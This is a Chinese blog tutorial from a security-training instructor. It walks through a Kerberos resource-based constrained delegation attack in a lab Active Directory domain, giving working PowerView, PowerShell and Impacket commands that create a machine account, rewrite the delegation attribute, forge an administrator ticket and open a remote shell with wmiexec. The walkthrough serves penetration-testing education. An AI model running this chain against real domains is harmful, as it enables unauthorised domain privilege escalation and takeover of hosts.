内网渗透--域环境下基于资源的约束委派利用

最新推荐文章于 2024-04-28 02:22:52 发布
最新推荐文章于 2024-04-28 02:22:52 发布
阅读量376 收藏 1
点赞数
文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sangfor_edu/article/details/125906362
版权

名词解释

Kerberos

Kerberos  是一种计算机网络授权协议,由MIT(麻省理工学院)开放的一套计算机软件。软件设计上采用客户端/服务器结构,并且能够进行相互认证,即客户端和服务器端均可对对方进行身份认证。可以用于防止窃听、防止重放攻击、保护数据完整性等场合,是一种应用对称密钥体制进行密钥管理的系统。

KDC

KDC是kerberos一部分,是Key Distribute Center,是负责分发密钥的中心。
KDC 包含两个部分:
AS(Authentication Server),发行TGT(Ticket-Granting Tickets )
TGS(Ticket Granting Server),发行服务凭证

S4U2SELF

S4U2self 允许服务代表特定用户向自己请求一个特殊的可转发服务票证。这是为了在用户以不使用 Kerberos 的方式对服务进行身份验证的情况下使用。在 KRB_TGS_REQ 第一次发送到 KDC 的过程中,它设置了可转发的标志,该标志要求 TGS 返回的标记为可转发的,从而能够与 S4U2proxy 扩展一起使用。在无约束委派中,使用 TGT 标识用户,但在这种情况下,S4U 扩展使用 PA-FOR-USER 结构作为"padata"预身份验证数据字段中的新类型。

S4U2PROXY

S4U2proxy调用者使用这个转发票证向 msds-allowedtodelegateto 中指定的任何 SPN 请求服务票证,假冒 S4U2self 步骤中指定的用户。KDC 检查请求的服务是否在被请求服务的 msds-allowedtodelegateto 字段中,并在该检查通过时发出票证。通过这种方式,委派"约束"到特定的目标服务。

SPN

SPN 是服务在使用 Kerberos 身份验证的网络上的唯一标识符,它由服务类、主机名和端口组成。

msDS-AllowedToActOnBehalfOfOtherIdentity

msDS-AllowedToActOnBehalfOfOtherIdentity属性作用是控制哪些用户可以模拟成域内任意用户然后向该计算机进行身份验证。

ms-ds-MachineAccountQuota

域内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在域中常见计算机账户的个数,默认是10。

mS-DS-CreatorSID

这个值代表的是将计算机加入到域内的用户,具有修改msDS-AllowedToActOnBehalfOfOtherIdentity的权限。

基于资源的约束委派

什么是委派

委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。

假设有三个对象:

服务/用户主机名
用户AhostA
服务BhostB
服务ChostC

假设用户A在使用主机hostB上的服务B,这时候用户A使用了服务B的一个功能,这个功能需要让主机hostB上的服务B访问主机HostC上的服务C中专属于用户A的部分才能完成,这时候主机hostB上的服务B就需要代表用户A去访问hostC上的服务C。这整个过程就是委派。

简而言之,上述过程就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C,委派需要提前在域控上进行配置,它可以理解成是一种权限。

委派的类型

  • • 非约束性委派
  • • 约束性委派
  • • 基于资源的约束性委派

基于资源的约束委派

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性,但是请求ST的过程和传统约束委派大同小异。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制自身。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

利用条件:简单来说就是你获得的用户对该主机的属性具有写权限,那么这个用户就可以对该主机进行攻击。

利用过程

在获取到域内一台主机权限时,可以查看该主机用户是否对其他主机是否拥有writeacl权限,如果对某主机拥有该权限,则可以通过基于资源的约束委派拿到这台机器的system权限,验证该权限可使用Powerview进行枚举。

利用思路大致如下所示:

1. 向目标主机添加机器账户
2. 修改msDS-AllowedToActOnBehalfOfOtherIdentity值为机器账户的sid
3. 以机器账户的身份伪造成administrator申请一张访问此机器账户机器的票据,
4. 利用这张票据去申请访问修改了msDS-AllowedToActOnBehalfOfOtherIdentity属性的机器。

在演示环境中拓扑如下所示

image.png

Win 7

角色:域成员
用户:wangling
ip: 192.168.199.33

Win 10

主机名:Win10
角色:域成员
用户:dd
ip: 192.168.199.194

winserver 2019

角色:域控制器
ip: 192.168.199.28

当前已经获取到Win 7主机的系统权限,想要判断是否能进行基于资源的约束委派攻击,则可以进行如下操作

获取用户SID

powershell -exe bypass -c "import-module .\powerview.ps1;Get-DomainUser - Identity wangling -Properties objectsid"

image.png

查看用户objectsid权限

powershell -exe bypass -c "import-module .\powerview.ps1;Get-DomainObjectAcl | ?{$_.SecurityIdentifier -match 'S-1-5-21-3558701794-647687089-843314620-1104'}"

image.png

可以看到wangling这个账户对WIN10也有writeacl权限,此时如何利用这一特殊属性呢?

创建机器账号

如果我们拥有配置某台主机msDS-AllowedToActOnBehalfOfOtherIdentity的权限与创建机器账户的权限,那我们就相当于拿到了此机器的所有权限。

msDS-AllowedToActOnBehalfOfOtherIdentity属性作用是控制哪些用户可以模拟成域内任意用户然后向该计算机进行身份验证。

为什么是机器账户,而不能是普通用户的账户?

因为攻击的时候会利用到S4U2Self协议,且该协议只适用于具有SPN的账户,普通账户不具备SPN的,而机器账户拥有SPN。

域内用户都有一个属性叫做ms-ds-MachineAccountQuota,它代表的是允许用户在域中常见计算机账户的个数,默认是10。那么这就代表我们如果拥有一个普通的域用户那么我们就可以利用这个用户最多可以创建十个新的计算机帐户也就是机器账户。

我们可以查询域内计算机的mS-DS-CreatorSID,这个值代表的是将计算机加入到域内的用户,它是具有修改msDS-AllowedToActOnBehalfOfOtherIdentity的权限的,如果我们可以拿到那个用户的凭据,就可以控制那个用户添加到域内的所有的电脑。

而此时,我们拥有wangling用户的权限且凭据可抓取,并对win10这台主机的属性具有写入权限

抓取凭据

image.png

添加机器账号

python3 addcomputer.py -method SAMR -dc-ip 192.168.199.28 -computer-name admin -computer-pass qwer1234$ "GOLDSUN.com/wangling:WangL@123"

image.png

查询机器账号的SSID

powershell -exe bypass -c "import-module .\PowerView.ps1;Get-DomainComputer -Identity admin -Properties objectsid"

image.png

设置资源委派

修改msDS-AllowedToActOnBehalfOfOtherIdentity值为机器账户的sid

import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3558701794-647687089-843314620-1601)"

以机器账户的身份伪造成administrator申请一张访问此机器账户机器的ticket(类似于白银票据),因为机器账户没有配置约束性委派,所以这张票据是不可转发的,但是在基于资源的约束性委派中,票据是否可以转发不重要,对之后对s4u2proxy不影响。

$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer win10| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

image.png

利用这张ticket去申请访问修改了msDS-AllowedToActOnBehalfOfOtherIdentity属性的机器。

powershell -exe bypass -c "import-module .\powerview.ps1;Get-DomainComputer -Identity win10 -Properties msds-allowedtoactonbehalfofotheridentity"

image.png

请求票据

python3 getST.py -spn host/win10.goldsun.com 'goldsun.com/admin$' -impersonate administrator -dc-ip 192.168.199.28

image.png

输出凭据

export KRB5CCNAME=administrator.ccache

使用wmiexec获取目标主机权限

python3 wmiexec.py goldsun.com/administrator@win10.goldsun.com -no-pass -k

作者:李忻蔚,深信服安全服务认证专家(SCSE-S),产业教育中心资深讲师,曾任职于中国电子科技网络信息安全有限公司,担任威胁情报工程师、渗透测试工程师、安全讲师;多年来为政府部门进行安全培训,安全服务;多次参与国家级、省级攻防比武的出题和保障任务,擅长Web安全、渗透测试与内网渗透方向。 

sangfor_edu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Powermad:PowerShell MachineAccountQuota和DNS利用工具
05-24
PowerShell MachineAccountQuota和DNS利用工具 维基 博客文章 职能 MachineAccountQuota函数 默认的Active Directory ms-DS-MachineAccountQuota属性设置允许所有用户向一个中最多添加10个计算机帐户。 Powermad包括一组用于利用ms-DS-MachineAccountQuota的功能,而无需将实际系统附加到AD。 Get-MachineAccountAttribute 该函数可以返回在计算机帐户属性中填充的值。 例子: 从机器帐户名称“ test”获取值“ description”。 Get-MachineAccountAttribute -MachineAccount test -Attribute discription Get-MachineAccountCreator 此功能利用
修改AD普通帐号加配额
weixin_34301132的博客
10-27 277
单一AD普通帐号默认可以加10次,可以更改普通帐号的加配额。运行Adsiedit.msc打开编辑器,右击连接到——连接点选择“选择一个已知命名上下文”下“默认命名上下文”确定,右键属性选择"ms-DS-MachineAccountQuota"属性,后面的数值显示是10就是默认的配额,选择编辑可以更改你需要的次数,0代表没有配额。 转载于:https://blog...
权限提升漏洞CVE-2022-26923在MAQ=0时的利用分析
Jinmindong
03-10 513
控的MAQ值设置为0,即不允许内普通用户新建机器账户,只能算是一种缓解措施,因为攻击者可以利用已有的机器账户进行攻击,而不需要新建一个机器账户。及时打补丁和升级才是最稳妥的措施。之前的CVE-2021-42278和CVE-2021-42287的漏洞也可以利用此思路来利用。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)
一句话 之 AD -- 禁止非管理账户将计算机加入--设置ms-DS-MachineAccountQuota属性值为0
chinaitv的专栏
03-07 4237
默认情况下,windows允许任何通过身份验证的用户将10个计算机对象加入。 可通过下面的操作,关闭这一默认权限:   -)”管理工具“--打开“ADSI Edit”工具; -)右键“ADSI Edit” -- “连接到”; -)“连接点”选项卡--“选择一个已知命名上下文”--“默认命名上下文”; -)“确定” -)展开“默认命名上下文”; -)右键“dc=domain,dc=
基于资源约束委派攻击
yy
04-13 2036
基于资源约束委派 (RBCD:Resource Based Constrained Delegation):为了使⽤户/资源更加独⽴,微软在Windows Server 2012中引⼊了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,⽽把设置属性的权限赋予给了机器⾃身。 配置了基于资源约束委派的账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值为被允许基于资源约束委派的账号的SID。如admin--pc的 msDS-AllowedT
win2008控计算机用户批量删除用户管理员权限_渗透技巧:MachineAccountQuota利用...
weixin_39903477的博客
12-04 694
MachineAccountQuota(MAQ)是一个级别的属性,默认情况下允许非特权用户将最多10台计算机连接到Active Directory(AD)。我第一次接触MAQ是在我作为网络管理员的时候。当时我被分配了一个将远程主机加入AD的任务。在添加了十台计算机后,当我再次尝试添加新机器时弹出了下面的错误消息:搜索错误消息后,我发现了ms-DS-MachineAccountQuota这个页面...
1.12-你的计算无法加入,已超出此所允许创建的计算机帐户的最大值,请跟系统管理员联系,以便重置或者增加此限制,如何解决?
封枫丰
10-22 1243
1.你的计算无法加入,已超出此所允许创建的计算机帐户的最大值,请跟系统管理员联系,以便重置或者增加此限制 2.如何做加权限管控?
谁可以将工作站添加到
allway2的博客
01-09 701
在交付给客户的众多安全审核和评估过程中,通常会发现Active Directory中配置的权限和用户权限范围太广。其中之一是“将工作站添加到”。有3个项目可能会影响谁可以将计算机添加到: ms-DS-MachineAccountQuota 它是“命名上下文”对象的属性。此属性指定单个用户可以向中添加多少台计算机。默认值为10。可以使用包括ADSIEdit.msc在内的其他工具来修改此值...
基于资源约束委派
mingyqf的博客
02-23 810
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
最新靶场场景 Active Directory 权限提升漏洞(CVE-2022-26923)
ZetaByte的博客
05-29 487
近日,Active Directory 服务组件被爆出存在特权提升漏洞,蛇矛实验室率先构建出了完整的靶场复现和利用环境,目标环境是基于"火天网演攻防演训靶场"进行搭建,通过火天网演中的环境构建模块,可以灵活的对目标网络进行设计和配置,并且可以快速进行场景搭建和复现工作。
Kerberos 委派攻击之基于资源约束委派
Adminxe的博客
03-06 574
CSDN自动迁移博客文章注意区别:约束委派 不能跨进行委派,基于资源约束委派可以跨和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源约束委派。基于资源约束委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源约束委派允许资源配置受信任的帐户委派给他们。基于资源约束委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置,
SharpAllowedToAct:通过基于资源约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
rbcd-attack:使用Impacket从外部进行基于Kerberos资源约束委派攻击
04-01
滥用基于Kerberos资源约束委派 TL; DR 此存储库是针对Windows Active Directory中针对Kerberos资源约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入的计算机(通常是Windows)发起的攻击。 仅使用Python3 (及其依赖项)实施攻击。 在上测试了最新的Impacket(撰写本文时为0.9.21)。 攻击 总而言之,攻击没有针对任何深度细节,而是针对计算机,正是与目标计算机相关的服务主体。 我们在这里需要具备的先决条件: 具有对目标计算机的写访问权的帐户(对目标计算机对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性的完全写访问权) 创建新计算机帐户的权限(通常是默认设置,请参见MachineAccount
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-内网渗透 -最终版.pdf
04-08
ISC-内网渗透 -最终版
内网渗透渗透.pdf
08-07
目录 工作组& 的渗透姿势 MS14-068 致谢
内网渗透知识大全1-87章全部教程
04-08
3.内网渗透(三)之基础知识-环境的介绍和优点 4.内网渗透(四)之基础知识-搭建环境 5.内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 6.内网渗透(六)之基础知识-中的权限划分和基本思想 7.内网渗透...
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
沪深websocket level2/level1行情推送接入示例
最新发布
04-28 667
【代码】沪深websocket level2/level1行情推送接入示例。
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的名字段来传输数据。 在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内网主机。内网主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境中可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值